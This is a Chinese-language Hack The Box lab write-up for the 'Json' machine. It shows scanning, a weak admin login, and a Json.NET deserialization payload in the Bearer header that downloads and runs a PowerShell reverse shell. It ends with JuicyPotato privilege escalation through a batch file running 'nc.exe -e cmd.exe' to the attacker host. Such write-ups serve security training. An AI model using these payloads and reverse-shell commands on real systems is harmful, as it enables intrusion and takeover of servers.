Basic Scan

Nmap结果表明其开放FTB WEB 以及SMB 三个服务的端口。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
~/Documents/HTB/Json root@kali
❯ cat nmap.txt
# Nmap 7.80 scan initiated Sat Feb  8 10:18:41 2020 as: nmap -sC -sV -oN nmap.txt 10.10.10.158
Nmap scan report for 10.10.10.158
Host is up (0.24s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          FileZilla ftpd
| ftp-syst:
|_  SYST: UNIX emulated by FileZilla
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Json HTB
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s
|_nbstat: NetBIOS name: JSON, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:f4:fa (VMware)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-02-08T06:20:25
|_  start_date: 2020-02-08T03:46:10

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb  8 10:20:33 2020 -- 1 IP address (1 host up) scanned in 112.34 seconds

Confirm Target

21端口Anonymous用户要求密码,SMB服务同要求密码。先将目标确定为80端口。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
~/Documents/HTB/Json root@kali
❯ smbclient -L 10.10.10.158
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_ACCESS_DENIED

~/Documents/HTB/Json root@kali 7s
❯ ftp 10.10.10.158
Connected to 10.10.10.158.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (10.10.10.158:root): anonymous
331 Password required for anonymous
Password:
530 Login or password incorrect!
Login failed.
Remote system type is UNIX.
ftp>

User.txt

打开Burpsuit 访问网站,使用若口令admin:admin登录成功的同时,我们注意到在请求头部中,有一个不寻常的字段Bearer。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
GET /api/Account/ HTTP/1.1

Host: 10.10.10.158

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: application/json, text/plain, */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://10.10.10.158/index.html

Bearer: eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=

Connection: close

Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=

其内容根据特征判断为Base64编码,解密后为admin用户的密码。经过尝试,均不适用于FTP和SMB。

1
2
3
~/Documents/HTB/Json root@kali 11m 3s
❯ echo -n 'eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=' | base64 -d
{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"}

将请求转入repeater,尝试对Bearer进行反序列化漏洞测试。将任意字符串编码为base64,向服务器发送get请求,得到结果如下,服务器解析了我们请求头部中的内容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
HTTP/1.1 400 Bad Request

Content-Type: text/html; charset=us-ascii

Server: Microsoft-HTTPAPI/2.0

Date: Sat, 08 Feb 2020 14:04:35 GMT

Connection: close

Content-Length: 339



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">

<HTML><HEAD><TITLE>Bad Request</TITLE>

<META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>

<BODY><h2>Bad Request - Invalid Header</h2>

<hr><p>HTTP Error 400. The request has an invalid header name.</p>

</BODY></HTML>

使用[ysoserial.net]进行利用,由于其默认运行指令调用的是cmd.exe,在其中调用powershell执行下载会牵扯到很多单双引号的转义,容易出错,故对其代码进行更改,改为默认使用powershell。并执行下载恶意reshell的ps1脚本。

1
2
3
4
5
6
7
8
9
10
11
~/Documents/HTB/Json root@kali
❯ cat reshell.code
{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['powershell', '-Command IEX(New-Object Net.WebClient).downloadString(\'http://10.10.14.164:8000/reshell.ps1\')']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

将上述代码进行base64编码 [这里为了同屏展示,没有使用替换\n]

1
2
3
4
5
6
7
8
9
10
11
12
13
~/Documents/HTB/Json root@kali
❯ base64 reshell.code
ewogICAgJyR0eXBlJzonU3lzdGVtLldpbmRvd3MuRGF0YS5PYmplY3REYXRhUHJvdmlkZXIsIFBy
ZXNlbnRhdGlvbkZyYW1ld29yaywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1
YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUnLCAKICAgICdNZXRob2ROYW1lJzonU3RhcnQn
LAogICAgJ01ldGhvZFBhcmFtZXRlcnMnOnsKICAgICAgICAnJHR5cGUnOidTeXN0ZW0uQ29sbGVj
dGlvbnMuQXJyYXlMaXN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRy
YWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODknLAogICAgICAgICckdmFsdWVzJzpb
J3Bvd2Vyc2hlbGwnLCAnLUNvbW1hbmQgSUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuZG93
bmxvYWRTdHJpbmcoXCdodHRwOi8vMTAuMTAuMTQuMTY0OjgwMDAvcmVzaGVsbC5wczFcJyknXQog
ICAgfSwKICAgICdPYmplY3RJbnN0YW5jZSc6eyckdHlwZSc6J1N5c3RlbS5EaWFnbm9zdGljcy5Q
cm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNL
ZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5J30KfQoK=

使用python3 搭建简易的web服务,将恶意ps1放置该目录下,并向服务器发送请求

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
GET /api/Account/ HTTP/1.1

Host: 10.10.10.158

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: application/json, text/plain, */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://10.10.10.158/index.html

Bearer: ewogICAgJyR0eXBlJzonU3lzdGVtLldpbmRvd3MuRGF0YS5PYmplY3REYXRhUHJvdmlkZXIsIFByZXNlbnRhdGlvbkZyYW1ld29yaywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUnLCAKICAgICdNZXRob2ROYW1lJzonU3RhcnQnLAogICAgJ01ldGhvZFBhcmFtZXRlcnMnOnsKICAgICAgICAnJHR5cGUnOidTeXN0ZW0uQ29sbGVjdGlvbnMuQXJyYXlMaXN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODknLAogICAgICAgICckdmFsdWVzJzpbJ3Bvd2Vyc2hlbGwnLCAnLUNvbW1hbmQgSUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuZG93bmxvYWRTdHJpbmcoXCdodHRwOi8vMTAuMTAuMTQuMTY0OjgwMDAvcmVzaGVsbC5wczFcJyknXQogICAgfSwKICAgICdPYmplY3RJbnN0YW5jZSc6eyckdHlwZSc6J1N5c3RlbS5EaWFnbm9zdGljcy5Qcm9jZXNzLCBTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5J30KfQo=

Connection: close

Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=

Cache-Control: max-age=0

使用nc监听端口,获得user.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
~/Documents/HTB/Json root@kali
❯ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.164] from (UNKNOWN) [10.10.10.158] 52223
Windows PowerShell running as user JSON$ on JSON
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>^C

~/Documents/HTB/Json root@kali 12m 9s
❯ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.164] from (UNKNOWN) [10.10.10.158] 52281
Windows PowerShell running as user JSON$ on JSON
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>cd C:\users
PS C:\users> dir


    Directory: C:\users


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         5/22/2019   4:52 PM            .NET v2.0
d----         5/22/2019   4:52 PM            .NET v2.0 Classic
d----         5/22/2019   4:52 PM            .NET v4.5
d----         5/22/2019   4:52 PM            .NET v4.5 Classic
d----         5/22/2019   4:52 PM            Classic .NET AppPool
d-r--         8/22/2013  11:39 AM            Public
d----         5/22/2019   5:37 PM            superadmin
d----          2/8/2020   8:37 AM            userpool


PS C:\users> cd userpool
PS C:\users\userpool> dir


    Directory: C:\users\userpool


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d-r--         5/22/2019   5:07 PM            Contacts
d-r--         5/22/2019   5:07 PM            Desktop
d-r--         5/22/2019   5:07 PM            Documents
d-r--         5/22/2019   5:07 PM            Downloads
d-r--         5/22/2019   5:07 PM            Favorites
d-r--         5/22/2019   5:07 PM            Links
d----          2/8/2020   8:01 AM            Microsoft
d-r--         5/22/2019   5:07 PM            Music
d-r--         5/22/2019   5:07 PM            Pictures
d-r--         5/22/2019   5:07 PM            Saved Games
d-r--         5/22/2019   5:07 PM            Searches
d-r--         5/22/2019   5:07 PM            Videos

PS C:\users\userpool> cd desktop
PS C:\users\userpool\desktop> dir


    Directory: C:\users\userpool\desktop


Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         5/22/2019   5:07 PM         32 user.txt


PS C:\users\userpool\desktop> type user.txt
34459a01f50050dc410db09bfb9f52bb
PS C:\users\userpool\desktop>

Root.txt

检查当前账户权限,发现该账户具有SeImpersonatePrivilege权限。使用[juicy-potato]进行提权。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
PS C:\users\userpool\desktop> whoami /all

USER INFORMATION
----------------

User Name     SID
============= =============================================
json\userpool S-1-5-21-1325271270-1453780805-384807897-1004


GROUP INFORMATION
-----------------

Group Name                           Type             SID                                                             Attributes
==================================== ================ =============================================================== ==================================================
Everyone                             Well-known group S-1-1-0                                                         Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                        Alias            S-1-5-32-545                                                    Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH                   Well-known group S-1-5-3                                                         Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                        Well-known group S-1-2-1                                                         Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization       Well-known group S-1-5-15                                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account           Well-known group S-1-5-113                                                       Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS                    Alias            S-1-5-32-568                                                    Mandatory group, Enabled by default, Enabled group
LOCAL                                Well-known group S-1-2-0                                                         Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\Json.Net                 Well-known group S-1-5-82-1097026443-1840990353-1306629843-3865948041-3469430407 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication     Well-known group S-1-5-64-10                                                     Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

确定系统版本为Windows Server 2012 R2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
PS C:\users\userpool> systeminfo

Host Name:                 JSON
OS Name:                   Microsoft Windows Server 2012 R2 Datacenter
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00252-80005-00001-AA602
Original Install Date:     5/22/2019, 4:27:16 PM
System Boot Time:          2/7/2020, 10:45:54 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 79 Stepping 1 GenuineIntel ~2100 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 4/5/2016
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              es-mx;Spanish (Mexico)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     6,143 MB
Available Physical Memory: 5,021 MB
Virtual Memory: Max Size:  7,807 MB
Virtual Memory: Available: 6,547 MB
Virtual Memory: In Use:    1,260 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.158
                                 [02]: fe80::f59a:5ad4:1e60:d4c9
                                 [03]: dead:beef::f59a:5ad4:1e60:d4c9
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.
PS C:\users\userpool>

根据该项目下的[List]以及[Test.bat],来判断哪些CLSIDs可用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PS C:\users\userpool> type result.log
{9678f47f-2435-475c-b24a-4606f8161c16};JSON\userpool
{98068995-54d2-4136-9bc9-6dbcb0a4683f};JSON\userpool
{0289a7c5-91bf-4547-81ae-fec91a89dec5};JSON\userpool
{9acf41ed-d457-4cc1-941b-ab02c26e4686};JSON\userpool
{d20a3293-3341-4ae8-9aaf-8e397cb63c34};NT AUTHORITY\SYSTEM
{1BE1F766-5536-11D1-B726-00C04FB926AF};NT AUTHORITY\LOCAL SERVICE
{5BF9AA75-D7FF-4aee-AA2C-96810586456D};NT AUTHORITY\LOCAL SERVICE
{A47979D2-C419-11D9-A5B4-001185AD2B89};NT AUTHORITY\LOCAL SERVICE
{C49E32C6-BC8B-11d2-85D4-00105A1F8304};NT AUTHORITY\SYSTEM
{8BC3F05E-D86B-11D0-A075-00C04FB68820};NT AUTHORITY\SYSTEM
{9B1F122C-2982-4e91-AA8B-E071D54F2A4D};NT AUTHORITY\SYSTEM
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM
PS C:\users\userpool>

将nc和JuicyPotato.exe上传至木目标,将nc reverse shell 写入batch文件,按照教程执行命令。获得root shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
C:\users\userpool>type rev5.bat
type rev5.bat
C:\Users\userpool\nc.exe -e cmd.exe 10.10.14.164 1337

C:\users\userpool>JuicyPotato.exe -t * -p C:\users\userpool\rev5.bat -l 1337 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
JuicyPotato.exe -t * -p C:\users\userpool\rev5.bat -l 1337 -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 1337
....
[+] authresult 0
{e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

C:\users\userpool>

Got Root.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
~/Documents/HTB/Json root@kali
❯ nc -nlvp 1337
listening on [any] 1337 ...
connect to [10.10.14.164] from (UNKNOWN) [10.10.10.158] 52336
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>cd C:\users\superadmin
cd C:\users\superadmin

C:\Users\superadmin>cd desktop
cd desktop

C:\Users\superadmin\Desktop>type root.txt
type root.txt
3cc85d1bed2ee84af4074101b991d441
C:\Users\superadmin\Desktop>